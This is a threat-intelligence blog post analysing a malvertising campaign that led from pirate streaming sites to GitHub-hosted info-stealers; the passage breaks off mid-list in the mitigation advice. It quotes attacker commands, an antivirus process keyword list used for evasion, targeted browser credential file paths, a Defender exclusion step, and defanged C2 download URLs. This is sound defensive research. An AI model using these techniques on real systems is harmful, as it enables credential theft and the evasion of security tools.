{"id":58260,"date":"2025-03-06T17:00:00","date_gmt":"2025-03-06T17:00:00","guid":{"rendered":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/"},"modified":"2025-03-06T17:00:00","modified_gmt":"2025-03-06T17:00:00","slug":"malvertising-campaign-leads-to-info-stealers-hosted-on-github","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/","title":{"rendered":"Malvertising campaign leads to info stealers hosted on GitHub"},"content":{"rendered":"<p>In early December 2024, Microsoft Threat Intelligence detected a large-scale malvertising campaign that impacted nearly one million devices globally in an opportunistic attack to steal information. The attack originated from illegal streaming websites embedded with malvertising redirectors, leading to an intermediary website where the user was then redirected to GitHub and two other platforms. The campaign impacted a wide range of organizations and industries, including both consumer and enterprise devices, highlighting the indiscriminate nature of the attack.<\/p>\n<p>GitHub was the primary platform used in the delivery of the initial access payloads and is referenced throughout this blog post; however, Microsoft Threat Intelligence also observed one payload hosted on Discord and another hosted on Dropbox.<\/p>\n<p>The GitHub repositories, which were taken down, stored malware used to deploy additional malicious files and scripts. Once the initial malware from GitHub gained a foothold on the device, the additional files deployed had a modular and multi-stage approach to payload delivery, execution, and persistence. The files were used to collect system information and to set up further malware and scripts to exfiltrate documents and data from the compromised host. 
This activity is tracked under the umbrella name Storm-0408, which we use to track numerous threat actors associated with remote access or information-stealing malware and who use phishing, search engine optimization (SEO), or malvertising campaigns to distribute malicious payloads.<\/p>\n<p>In this blog, we provide our analysis of this large-scale malvertising campaign, detailing our findings regarding the redirection chain and various payloads used across the multi-stage attack chain. We further provide recommendations for mitigating the impact of this threat, detection details, indicators of compromise (IOCs), and hunting guidance to locate related activity. By sharing this research, we aim to raise awareness about the tactics, techniques, and procedures (TTPs) used in this widespread activity so organizations can better prepare and implement effective mitigation strategies to protect their systems and data.<\/p>\n<p>We would like to thank the GitHub security team for their prompt response and collaboration in taking down the malicious repositories.<\/p>\n<h2 class=\"wp-block-heading\" id=\"github-activity-and-redirection-chain\">GitHub activity and redirection chain<\/h2>\n<p>Since at least early December 2024, multiple hosts downloaded first-stage payloads from malicious GitHub repositories. The users were redirected to GitHub through a series of other redirections. Analysis of the redirector chain determined the attack likely originated from illegal streaming websites where users can watch pirated videos. The streaming websites embedded malvertising redirectors within movie frames to generate pay-per-view or pay-per-click revenue from malvertising platforms. 
These redirectors subsequently routed traffic through one or two additional malicious redirectors, ultimately leading to another website, such as a malware or tech support scam website, which then redirected to GitHub.<\/p>\n<p>Multiple stages of malware were deployed in this campaign, as listed below; which stages of activity followed depended on the payload dropped during the second stage.<\/p>\n<ul class=\"wp-block-list\">\n<li>The first-stage payload that was hosted on GitHub served as the dropper for the next stage of payloads.<\/li>\n<li>The second-stage files were used to conduct system discovery and to exfiltrate system information that was Base64-encoded into the URL and sent over HTTP to an IP address. The information collected included data on memory size, graphic details, screen resolution, operating system (OS), and user paths.<\/li>\n<li>Various third-stage payloads were deployed depending on the second-stage payload. In general, the third-stage payload conducted additional malicious activities such as command and control (C2) to download additional files and to exfiltrate data, as well as defense evasion techniques.<\/li>\n<\/ul>\n<p>The full redirect chain was composed of four to five layers. Microsoft researchers determined malvertising redirectors were contained within an <a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTML\/Element\/iframe\">iframe<\/a> on illegal streaming websites.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-2.webp\" alt=\"A screenshot of code from a streaming video website and iframe showing the malvertising redirector URL\" class=\"wp-image-137799 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-2.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 1. 
Code from a streaming video website and iframe showing the malvertising redirector URL<\/em><\/figcaption><\/figure>\n<p>There were several redirections that occurred before arriving at the malicious content stored on GitHub.<\/p>\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"935\" height=\"211\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image.jpg\" alt=\"A diagram of the redirection chain first depicting the illegal streaming website with iframe followed by the malicious redirector and counter, which redirects to the malvertising distributor, which finally lands on the malicious content hosted on GitHub.\" class=\"wp-image-137795\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image.jpg 935w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-300x68.jpg 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-768x173.jpg 768w\" sizes=\"auto, (max-width: 935px) 100vw, 935px\"><figcaption class=\"wp-element-caption\"><em>Figure 2. Redirection chain from pirate streaming website to malware files on GitHub<\/em><\/figcaption><\/figure>\n<h2 class=\"wp-block-heading\" id=\"attack-chain\">Attack chain<\/h2>\n<p>Once the redirection to GitHub occurred, the malware hosted on GitHub established the initial foothold on the user\u2019s device and functioned as a dropper for additional payload stages and for running malicious code. The additional payloads included information stealers to collect system and browser information on the compromised device, most of which were either Lumma stealer or an updated version of <a href=\"https:\/\/github.com\/antivirusevasion69\/doenerium\">Doenerium<\/a>. Depending on the initial payload, NetSupport, a remote monitoring and management (RMM) tool, was also often deployed alongside the infostealer. 
Besides the information stealers, PowerShell, JavaScript, VBScript, and AutoIT scripts were run on the host. The threat actors used living-off-the-land binaries and scripts (LOLBAS) like <em>PowerShell.exe<\/em>, <a href=\"https:\/\/learn.microsoft.com\/visualstudio\/msbuild\/msbuild-reference\"><em>MSBuild.exe<\/em><\/a>, and <em>RegAsm.exe<\/em> for C2 and exfiltration of user data and browser credentials.<\/p>\n<p>After the initial foothold was gained, the activity led to a modular and multi-stage approach to payload delivery, execution, and persistence. Each stage dropped another payload with a different function, as outlined below. Actions conducted across these stages include system discovery (memory, GPU, OS, signed-in users, and others), opening browser credential files, Data Protection API (DPAPI) crypt data calls, and other functions such as obfuscated script execution and named pipe creations to conduct data exfiltration. Persistence was achieved through modification of the registry run keys and the addition of a shortcut file to the Windows <em>Startup<\/em> folder.<\/p>\n<p>Several stages of malicious activity were observed, covering deployment of additional malware, collection, and exfiltration of data to a C2. While not every single initial payload followed these exact steps, this is an overall view of what occurred across most incidents analyzed:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/General-depiction-of-the-four-stages-diagram.webp\" alt=\"A diagram generally displaying the four stages. The first stage involves the malvertising website redirecting users to GitHub pages, leading to a payload downloading from the repo. In the second stage, the payload performs system discovery and exfiltrates collected system information and stage-two payloads drop additional payloads. 
In the third stage, if the payload is a PowerShell script, it downloads NetSupport RAT from C2, sets persistence, and it may deliver a Lumma Stealer payload using MSBuild.exe for exfiltration. If the third stage payload is an .exe, it creates and runs a .cmd file and drops renamed AutoIT interpreter with a .com file extension, leading to the fourth stage. In the final stage, AutoIT launches binary and may drop an AutoIT interpreter with .scr file extensions, where a JavaScript file is dropped for running and persistence of those files. Finally, the AutoIT payload uses RegAsm.exe or PowerShell.exe to open files, enable browser remote debugging, and exfiltrate data. PowerShell may be deployed to set exclusion paths for Defender and\/or drop NetSupport.\" class=\"wp-image-137800 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/General-depiction-of-the-four-stages-diagram.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 3. General depiction of the four stages<\/em><\/figcaption><\/figure>\n<p>During the first stage, a payload is dropped onto the user\u2019s device from the binary hosted on GitHub, establishing a foothold on that device. As of mid-January 2025, the first-stage payloads discovered were digitally signed with a newly created certificate. A total of twelve different certificates were identified, all of which have been revoked.<\/p>\n<p>Most of these initial payloads dropped the following legitimate files to leverage their functionality. 
These files were either leveraged by the first-stage payload or by later-stage payloads, depending on the actions being conducted.<\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"24.5\">\n<tr>\n<td><strong>File name<\/strong><\/td>\n<td><strong>Function<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>app-64.7z<\/em><\/td>\n<td>This is a compressed archive that stores the second-stage payload and additional dropped files.<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td><em>app.asar<\/em><\/td>\n<td>This is an archive file specific to Electron applications, which are directly installed programs.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>d3dcompiler_47.dll<\/em><\/td>\n<td>This file is often included in DirectX redistributables, which are commonly bundled with Microsoft installers for games and graphics applications.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>elevate.exe<\/em><\/td>\n<td>This file is used by various installers and scripts to run processes with elevated privileges, not specific to Microsoft.<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td><em>ffmpeg.dll<\/em><\/td>\n<td>This file is associated with FFmpeg, a popular multimedia framework used to handle video, audio, and other multimedia files and streams.<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td><em>libEGL.dll<\/em><\/td>\n<td>This file is part of the ANGLE project, which is often found in applications that use OpenGL Embedded Systems (ES), including some web browsers and games.<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td><em>libEGLESv2.dll<\/em><\/td>\n<td>This file is part of the ANGLE project, which is often found in applications that use OpenGL ES, including some web browsers and games.<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>LICENSES.chromium.html<\/em><\/td>\n<td>This file could contain information about the system or browser.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>nsis7z.dll<\/em><\/td>\n<td>This file is associated 
with the plugins for the Nullsoft Scriptable Install System (NSIS), which is used to create installers for various software.<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>StdUtils.dll<\/em><\/td>\n<td>This file is associated with the plugins for the NSIS.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>System.dll<\/em><\/td>\n<td>This file is part of the .NET Framework assembly, typically included in Microsoft installers for applications that rely on the .NET Framework.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>vk_swiftshader.dll<\/em><\/td>\n<td>This file is associated with SwiftShader, which is used in applications that need a CPU-based implementation of the Vulkan API.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>vulkan-1.dll<\/em><\/td>\n<td>This file is associated with applications that use the Vulkan Graphics API, such as games and graphics software.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p>Depending on the first-stage payload that was initially established on the compromised device, Microsoft observed different second-stage payloads and several different methods for delivering these payloads to the device.<\/p>\n<h3 class=\"wp-block-heading\" id=\"second-stage-payload-system-discovery-collection-and-exfiltration\">Second-stage payload: System discovery, collection, and exfiltration<\/h3>\n<p>The main purpose of the second-stage payload is to conduct system discovery and collect that data for exfiltration to the C2. 
The system information collected includes data such as memory size, graphic card details, screen resolution, operating system, user paths, and a reference to the second-stage payload\u2019s file name.<\/p>\n<p>This was accomplished by querying the registry key <em>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName<\/em> for the Windows OS version and running commands, such as the <a href=\"https:\/\/learn.microsoft.com\/windows-server\/administration\/windows-commands\/echo\"><em>echo<\/em><\/a> command, to gather the device\u2019s name (<em>%COMPUTERNAME%)<\/em> and domain name (<em>%USERDOMAIN%).<\/em><\/p>\n<p>System data collected by the second-stage payload is Base64-encoded and exfiltrated as a query parameter to an IP address.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image.webp\" alt=\"Screenshot of code depicting the typical format of the URL observed when exfiltrating information collected from the compromised device. \" class=\"wp-image-137794 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 4. Typical format of the URL observed when exfiltrating information collected from the compromised device<\/em><\/figcaption><\/figure>\n<h3 class=\"wp-block-heading\" id=\"third-stage-payload-powershell-and-exe-binary\">Third-stage payload: PowerShell and <em>.exe<\/em> binary<\/h3>\n<p>Depending on the second-stage payload, either one or multiple executables are dropped onto the compromised device, and sometimes an accompanying encoded PowerShell script. These files initiate a chain of events that conduct command execution, payload delivery, defensive evasion, persistence, C2 communications, and data exfiltration. 
The analysis of the dropped executables is first discussed below, followed by review of the PowerShell scripts observed.<\/p>\n<h4 class=\"wp-block-heading\" id=\"third-stage-exe-analysis\">Third-stage .exe analysis<\/h4>\n<p>The second-stage payloads run the dropped third-stage executables using the command prompt (for example, <em>cmd.exe \/d \/s \/c \"\"C:\\Users\\&lt;user&gt;\\AppData\\Local\\Temp\\ApproachAllan.exe\"\"<\/em>). The <em>\/c<\/em> flag ensures that the command runs and then exits. When the third-stage <em>.exe<\/em> runs, it drops a command file (<em>.cmd<\/em>) and launches it using the command prompt (for example, <em>\"cmd.exe\" \/c copy Beauty Beauty.cmd &amp;&amp; Beauty.cmd<\/em>). The <em>.cmd<\/em> file performs several actions, such as running <em>tasklist<\/em> to enumerate running programs. This is followed by <em>findstr<\/em> to search for keywords associated with security software:<\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong><em>findstr<\/em> keyword<\/strong><\/td>\n<td><strong>Associated software<\/strong><\/td>\n<\/tr>\n<tr>\n<td>wrsa<\/td>\n<td>Webroot SecureAnywhere<\/td>\n<\/tr>\n<tr>\n<td>opssvc<\/td>\n<td>Quick Heal<\/td>\n<\/tr>\n<tr>\n<td>AvastUI<\/td>\n<td>Avast Antivirus<\/td>\n<\/tr>\n<tr>\n<td>AVGUI<\/td>\n<td>AVG Antivirus<\/td>\n<\/tr>\n<tr>\n<td>bdservicehost<\/td>\n<td>Bitdefender Antivirus<\/td>\n<\/tr>\n<tr>\n<td>nsWscSvc<\/td>\n<td>Norton Security<\/td>\n<\/tr>\n<tr>\n<td>ekrn<\/td>\n<td>ESET<\/td>\n<\/tr>\n<tr>\n<td>SophosHealth<\/td>\n<td>Sophos<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p>The <em>.cmd<\/em> file also concatenates multiple files into one with a single-character file name: <em>\"cmd \/c copy \/b ..\\Verzeichnis + ..\\Controlling + ..\\Constitute + ..\\Enjoyed + ..\\Confusion + ..\\Min +..\\Statutory J\"<\/em>. 
This single character filename is used next.<\/p>\n<p>Following this, the third-stage <em>.exe<\/em> produces an AutoIT v3 interpreter file that is renamed from the typical file name of <em>AutoIt3.exe<\/em> and uses a <em>.com<\/em> file extension. The <em>.cmd<\/em> file initiates the execution of the<em> .com<\/em> file against the single character binary (such as <em>Briefly.com J<\/em>). Note, most of the second-stage payloads follow this progression chain, and as mentioned a second-stage payload can also drop multiple executables, all following the same process. For example:<\/p>\n<p><strong>First stage<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><em>X-essentiApp.exe<\/em><\/li>\n<\/ul>\n<p><strong>Second stage<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><em>Ionixnignx.exe<\/em><\/li>\n<\/ul>\n<p><strong>Third stage<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><em>EverybodyViewing.exe<\/em><\/li>\n<li><em>ReliefOrganizational.exe<\/em><\/li>\n<li><em>InflationWinston.exe<\/em><\/li>\n<\/ul>\n<p><strong>Third-stage command files<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><em>Beauty.cmd<\/em><\/li>\n<li><em>Possess.cmd<\/em><\/li>\n<li><em>Villa.cmd<\/em><\/li>\n<\/ul>\n<p><strong>Fourth-stage AutoIT <em>.com<\/em> files<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><em>Alexandria.com<\/em><\/li>\n<li><em>Kills.com<\/em><\/li>\n<li><em>Briefly.com<\/em><\/li>\n<\/ul>\n<p>We observed multiple <em>.com<\/em> files originating from different dropped executables, each performing distinct functions while occasionally overlapping in behavior. These files facilitate persistence, process injection, remote debugging, and data exfiltration through various mechanisms. One <em>.com<\/em> file, such as <em>Alexandria.com<\/em>, drops a <em>.scr<\/em> file (another renamed AutoIT interpreter), and a<em> .js<\/em> (JavaScript) file with the same name as the <em>.scr <\/em>file. 
The purpose of the JavaScript file is to ensure persistence by creating a <em>.url <\/em>internet shortcut that points to the JavaScript file and is placed in the <em>Startup<\/em> folder, ensuring that the <em>.scr <\/em>file executes when the <em>.js<\/em> file executes (through <em>Wscript.exe<\/em>) upon user sign-in. Alternatively, persistence can be achieved using scheduled task creation. The <em>.scr <\/em>file can initiate C2 connections, enable remote debugging on Chrome or Edge within a hidden desktop session, or create TCP listening sockets on ports 9220-9229. This functionality allows threat actors to monitor browsing activity and interact with an active browser instance. These files can also open sensitive data files, indicating their role in facilitating post-exploitation activities.<\/p>\n<p>Another <em>.<\/em><em>com<\/em> file, such as <em>affiliated.com<\/em>, also focuses on remote debugging and browser monitoring. In addition to remote monitoring, <em>affiliated.com<\/em> initiates network connections to Telegram, Let\u2019s Encrypt, and threat actor domains, potentially for C2 or exfiltration. It also accesses DPAPI to decrypt sensitive stored credentials and retrieve browser data.<\/p>\n<p>The final observed <em>.<\/em><em>com<\/em> file, such as <em>Briefly.com<\/em>, exhibits behavior similar to <em>affiliated.com<\/em> but extends its capabilities to include screenshot capture, data exfiltration, and PowerShell-based execution. This file accesses browser and user data for collection, establishes connections to Pastebin and additional C2 domains, and drops the fourth-stage PowerShell script.<\/p>\n<p>The order in which these <em>.<\/em><em>com<\/em> files run is not strictly defined, as one or multiple files can perform overlapping functions depending on the third-stage payload. 
In many cases, the <em>.<\/em><em>com<\/em> files also leverage LOLBAS like <em>RegAsm.exe<\/em> by dropping a legitimate file into the <em>%TEMP%<\/em> directory or injecting malicious code into it using <em>NtAllocateVirtualMemory<\/em> and <em>SetThreadContext <\/em>API function calls. <em>RegAsm.exe<\/em> is used to establish C2 connections over TCP ports 15647 or 9000, exfiltrating data, accessing DPAPI for decryption, monitoring keystrokes using the <em>WH_KEYBOARD_LL <\/em>hook, and more. This flexibility in execution allows threat actors to tailor their approach based on environmental factors, such as security configurations and user activity.<\/p>\n<p>Browser data files seen accessed:<\/p>\n<ul class=\"wp-block-list\">\n<li><em>\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\&lt;user profile uid&gt;.default-release\\cookies.sqlite<\/em><\/li>\n<li><em>\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\&lt;user profile uid&gt;.default-release\\formhistory.sqlite<\/em><\/li>\n<li><em>\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\&lt;user profile uid&gt;.default-release\\key4.db<\/em><\/li>\n<li><em>\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\&lt;user profile uid&gt;.default-release\\logins.json<\/em><\/li>\n<li><em>\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data<\/em><\/li>\n<li><em>\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data<\/em><\/li>\n<li><em>\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data<\/em><\/li>\n<\/ul>\n<p>User data file paths seen accessed:<\/p>\n<ul class=\"wp-block-list\">\n<li><em>C:\\\\Users\\&lt;user&gt;\\\\OneDrive<\/em><\/li>\n<li><em>C:\\\\Users\\&lt;user&gt;\\\\Documents<\/em><\/li>\n<li><em>C:\\\\Users\\&lt;user&gt;\\\\Downloads<\/em><\/li>\n<\/ul>\n<h4 class=\"wp-block-heading\" id=\"third-stage-powershell-analysis\">Third-stage PowerShell analysis<\/h4>\n<p>If a PowerShell script is also dropped by the second-stage payload, it includes Base64-obfuscated commands to conduct 
actions, such as using <a href=\"https:\/\/techcommunity.microsoft.com\/blog\/containers\/tar-and-curl-come-to-windows\/382409\"><em>curl<\/em><\/a> to download additional files like NetSupport from the C2, creating persistence for the NetSupport RAT, and exfiltrating system information to C2 servers. To ensure that neither errors nor the progress meter are displayed on the compromised device, the <em>curl<\/em> command is often used with the <a href=\"https:\/\/curl.se\/docs\/manpage.html#-s\"><em>--silent<\/em><\/a> option when downloading files from the C2. PowerShell is often configured to run without restrictions with the <a href=\"https:\/\/learn.microsoft.com\/powershell\/module\/microsoft.powershell.security\/set-executionpolicy?view=powershell-5.1#-executionpolicy\"><em>-ExecutionPolicy Bypass<\/em><\/a> parameter.<\/p>\n<p>As an example, in some of the incidents, when the second-stage payload runs, a PowerShell script is dropped and executed. The script sends the compromised device\u2019s name to the C2 and downloads NetSupport RAT from the same C2.<\/p>\n<ul class=\"wp-block-list\">\n<li>Second-stage payload: <em>Squarel.exe<\/em><\/li>\n<li>PowerShell script: SHA-256: d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb<\/li>\n<li>C2 domain: <em>keikochio[.]com<\/em><\/li>\n<li>NetSupport RAT: SHA-256: 32a828e2060e92b799829a12e3e87730e9a88ecfa65a4fc4700bdcc57a52d995<\/li>\n<\/ul>\n<p>In another case, a second-stage payload drops a PowerShell script, which connects to <em>hxxps:\/\/ipinfo[.]io<\/em> to gather the compromised device\u2019s external-facing IP address. The script sends this information to a Telegram chat, then drops <em>presentationhost.exe<\/em> (a renamed NetSupport binary) and <em>remcmdstub.exe<\/em> (NetSupport Command Manager) into the <em>%TEMP%<\/em> directory. Finally, the PowerShell script establishes persistence for <em>presentationhost.exe<\/em> by adding it to the auto-start extensibility points (ASEP) registry keys. 
When it runs, the NetSupport RAT connects to the C2 and captures a screenshot of the compromised device\u2019s desktop. It also delivers a Lumma executable that drops a VBScript file with the same name. The VBScript file runs encoded PowerShell to initiate C2 connections and launches <em>MSBuild.exe<\/em> to enable Chrome remote debugging on a hidden desktop. Additionally, <em>presentationhost.exe<\/em> initiates <em>remcmdstub.exe<\/em>, which leverages<em> iScrPaint.exe<\/em> (iTop Screen Recorder) to run <em>MSBuild.exe<\/em> and access browser credential files for exfiltration. The <em>iScrPaint.exe<\/em> file also establishes persistence by placing a .<em>lnk<\/em> shortcut in the Windows <em>Startup<\/em> folder, ensuring it runs on system reboot.<\/p>\n<ul class=\"wp-block-list\">\n<li>Second-stage payload: <em>Application.exe<\/em><\/li>\n<li>PowerShell script: SHA-256: 483796a64f004a684a7bc20c1ddd5c671b41a808bc77634112e1703052666a64<\/li>\n<li>C2: <em>hxxp:<\/em>\/\/<em>5<\/em><em>.10.250[.]240\/fakeurl.htm<\/em><\/li>\n<\/ul>\n<p>The last observed third-stage PowerShell script was dropped by three second-stage payloads. The script sends the compromised device\u2019s name to the C2 server. It then changes the working directory to <em>$env:APPDATA<\/em>, before using <em>Start-BitsTransfer<\/em> to download NetSupport from the C2. To evade detection, it modifies system security settings forcing TLS1.2 for encrypted C2 communication. These files are extracted into a newly created <em>WinLibraryClient <\/em>directory under <em>AppData <\/em>and then are launched. The script establishes persistence for the <em>client32.exe (<\/em>NetSupport RAT<em>)<\/em> by modifying the ASEP registry. 
<em>Client32.exe<\/em> initiates C2 connections to <em>hxxp:\/\/79.132.128[.]77\/fakeurl.htm<\/em>.<\/p>\n<ul class=\"wp-block-list\">\n<li>Second-stage payloads: <em>SalmonSamurai.exe<\/em>, <em>LakerBaker.exe<\/em>, and <em>DisplayPhotoViewer.exe<\/em><\/li>\n<li>PowerShell script: SHA-256: 670218cfc5c16d06762b6bc74cda4902087d812e72c52d6b9077c4c4164856b6<\/li>\n<li>C2 domain: <em>stocktemplates[.]net<\/em><\/li>\n<\/ul>\n<p>Additionally, one observed execution included registry enumeration of <em>HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\ <\/em>to identify installed applications and security software. It also queries the system\u2019s domain status using Windows Management Instrumentation (WMI) and scans for cryptocurrency wallets, including Ledger Live, Trezor Suite, KeepKey, BCVault, OneKey, and BitBox, indicating potential financial data theft.<\/p>\n<h3 class=\"wp-block-heading\" id=\"fourth-stage-powershell-analysis\">Fourth-stage PowerShell analysis<\/h3>\n<p>Depending on the <em>.com<\/em> file that ran (like <em>Briefly.com<\/em>), the renamed AutoIT file may drop a PowerShell script (SHA-256: <a href=\"https:\/\/www.virustotal.com\/gui\/file\/2a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3\">2a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3<\/a>). 
The obfuscated PowerShell code uses the <a href=\"https:\/\/learn.microsoft.com\/powershell\/module\/defender\/add-mppreference\"><em>Add-MpPreference<\/em><\/a> cmdlet to add exclusion paths to Microsoft Defender, so the specified folders are not scanned.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-1.webp\" alt=\"Screenshot of code depicting the deobfuscated commands to add exclusion paths to Windows Defender.\" class=\"wp-image-137798 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-1.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 5. Deobfuscated commands to add exclusion paths to Windows Defender<\/em><\/figcaption><\/figure>\n<p>The script above is sometimes followed by an instance of Base64-encoded PowerShell commands. The PowerShell commands perform the following actions:<\/p>\n<ul class=\"wp-block-list\">\n<li>Send a web request to <em>hxxps:\/\/360[.]net<\/em> and close the response.<\/li>\n<li>Send a web request to <em>hxxps:\/\/baidu[.]com<\/em> and close the response.<\/li>\n<li>Download data from <em>hxxps:\/\/klipcatepiu0[.]shop\/int_clp_sha.txt<\/em> using a web client.<\/li>\n<li>Write the downloaded data to a memory stream and save it as a <em>.zip<\/em> file named <em>null.zip<\/em> (SHA-256: f07b8e5622598c228bfc9bff50838a3c4fffd88c436a7ef77e6214a40b0a2bae) in the <em>C:\\Users\\&lt;Username&gt;\\AppData\\Local\\Temp<\/em> directory.<\/li>\n<\/ul>\n<h2 class=\"wp-block-heading\" id=\"recommendations\">Recommendations<\/h2>\n<p>Microsoft recommends the following mitigations to reduce the impact of this threat.<\/p>\n<h3 class=\"wp-block-heading\" id=\"strengthen-microsoft-defender-for-endpoint-configuration\">Strengthen Microsoft Defender for Endpoint configuration<\/h3>\n<ul 
class=\"wp-block-list\">\n<li>Ensure that <a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection\" target=\"_blank\" rel=\"noreferrer noopener\">tamper protection<\/a> is enabled in Microsoft Defender for Endpoint.&nbsp;<\/li>\n<li>Enable <a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/enable-network-protection\" target=\"_blank\" rel=\"noreferrer noopener\">network protection<\/a> in Microsoft Defender for Endpoint.&nbsp;<\/li>\n<li>Turn on <a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/web-protection-overview\">web protection<\/a>.<\/li>\n<li>Run <a href=\"https:\/\/learn.microsoft.com\/microsoft-365\/security\/defender-endpoint\/edr-in-block-mode\" target=\"_blank\" rel=\"noreferrer noopener\">endpoint detection and response&nbsp;(EDR) in block mode<\/a>&nbsp;so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. 
EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.<\/li>\n<li>Configure <a href=\"https:\/\/learn.microsoft.com\/microsoft-365\/security\/defender-endpoint\/automated-investigations\" target=\"_blank\" rel=\"noreferrer noopener\">investigation and remediation<\/a> in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume.<\/li>\n<li>Microsoft Defender XDR customers can turn on the following <a href=\"https:\/\/learn.microsoft.com\/microsoft-365\/security\/defender-endpoint\/attack-surface-reduction\" target=\"_blank\" rel=\"noreferrer noopener\">attack surface reduction rules<\/a> to prevent common attack techniques used by threat actors. Rules can be deployed in audit mode first to measure their impact on legitimate software before they are switched to block mode.\n<ul>\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion\" target=\"_blank\" rel=\"noreferrer noopener\">Block<\/a> executable files from running unless they meet a prevalence, age, or trusted list criterion<\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-execution-of-potentially-obfuscated-scripts\">Block<\/a> execution of potentially obfuscated scripts<\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/microsoft-365\/security\/defender-endpoint\/attack-surface-reduction-rules-reference#block-javascript-or-vbscript-from-launching-downloaded-executable-content\">Block<\/a> JavaScript or VBScript from launching downloaded executable content<\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-process-creations-originating-from-psexec-and-wmi-commands\">Block<\/a> process creations originating from PSExec and WMI commands<\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem\" target=\"_blank\" rel=\"noreferrer noopener\">Block<\/a> credential stealing from the Windows local security authority subsystem<\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-use-of-copied-or-impersonated-system-tools-preview\">Block<\/a> use of copied or impersonated system 